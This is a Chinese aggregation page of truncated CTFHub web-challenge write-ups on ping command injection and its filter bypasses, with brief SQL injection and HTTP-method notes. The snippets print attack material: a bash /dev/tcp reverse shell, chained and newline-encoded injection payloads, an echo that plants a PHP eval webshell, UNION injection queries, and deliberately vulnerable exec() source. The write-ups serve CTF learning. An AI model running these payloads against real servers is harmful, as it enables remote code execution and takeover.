CTFHub web技能树 RCE】的更多相关文章

一个简单的ping,还没有过滤,源码也给出来了 ls一下 127.0.0.1 & ls 有一个可疑的php文件,,,但是直接访问和 cat 都出不来... 试了几下反弹shell,没成功...于是直接用echo了一个一句话进去 .php 注意这里$转义了一下,不转的话会被识别成变量.. 之后拿我40米长的菜刀 php用了注释..和想的差不多 这题竟然花了那么久 我是这样反弹shell.. bash -i >& /dev/tcp/ip/port 过滤空格的 127.0.0.1&…
在一个大佬的突然丢了个题过来,于是去玩了玩rce的两道题 大佬的博客跳转链接在此->>>大佬召唤机 叫 命令注入 一上来就是源码出现,上面有个ping的地方 <?php $res = FALSE; if (isset($_GET['ip']) && $_GET['ip']) { $cmd = "ping -c 4 {$_GET['ip']}"; exec($cmd, $res); } ?> <!DOCTYPE html> <…
Web HTTP协议 请求方式…
打开靶机 查看页面信息 查看源码可以发现这一次过滤了很多东西,查看当前目录信息 查询到%0a为换行符,可以利用这个url编码进行命令注入,开始尝试 http://challenge-2a4584dabb18d320.sandbox.ctfhub.com:10080/?ip=127.0.0.1%0als# 查看flag_is_here文件夹内文件信息 challenge-2a4584dabb18d320.sandbox.ctfhub.com:10080/?ip=127.0.0.1%0Als<fla…
过滤目录分隔符 打开靶机 查看页面信息 查询当前目录下文件结构 进入flag_is_here目录 127.0.0.1;cd flag_is_here 127.0.0.1||ls 执行之后发现还是在当前目录 使用如下命令进行查询 127.0.0.1;cd flag_is_here;ls 查看文件信息 127.0.0.1;cd flag_is_here;cat flag_1633660217512.php 成功拿到flag 过滤运算符 查看文件结构 ;ls 查看文件信息 ;cat flag_4603…
打开靶机 查看页面信息 开始尝试注入 127.0.0.1 || ls 尝试绕过 127.0.0.1||ls 使用cat命令查看flag 127.0.0.11||cat<flag_10872536812766.php 拿到flag 绕过空格过滤方法很多,详情请自行百度搜索…
打开靶机 查看页面信息 构造payload 127.0.0.1 || ls 题目提示过滤了cat,但我还是想试试 果然不行 网页访问没有结果,应该和上题一样被注释了,使用和同样的方法进行解题 利用命令执行写入一句话木马 127.0.0.1 &echo "<?php @eval(\$_POST['a']);?>" >> shell.php 成功拿到flag…
打开靶机 查看页面信息 输入127.0.0.1进行测试 构造payload 127.0.0.1&ls 查看文件内容信息 127.0.0.1 & cat 179852221619745.php 没有反应...... 利用命令执行写入一句话木马 127.0.0.1 &echo "<?php @eval(\$_POST['a']);?>" >> shell.php 成功拿到flag…
今天CTFHub正式上线了,https://www.ctfhub.com/#/index,之前有看到这个平台,不过没在上面做题,技能树还是很新颖的,不足的是有的方向的题目还没有题目,CTF比赛时间显示也挺好的,这样就不用担心错过比赛了. 先做签到题,访问博客就可以拿到. Web前置技能, 可以看到大部分题目都还没有补充完成. HTTP协议第一题:请求方式 一般来说我们比较常用的是GET和POST方法 开启题目 可以看到是需要我们使用CTFHUB方法访问该网址,burpsuite里面修改请求方法好…
Web题下的SQL注入 1,整数型注入 使用burpsuite,?id=1%20and%201=1 id=1的数据依旧出现,证明存在整数型注入 常规做法,查看字段数,回显位置 ?id=1%20order%20by%202 字段数为2 ?id=1%20and%201=2%20union%20select%201,2 1,2位置都回显,查表名 ?id=1%20and%201=2%20union%20select%20group_concat(table_name),2%20from%20inform…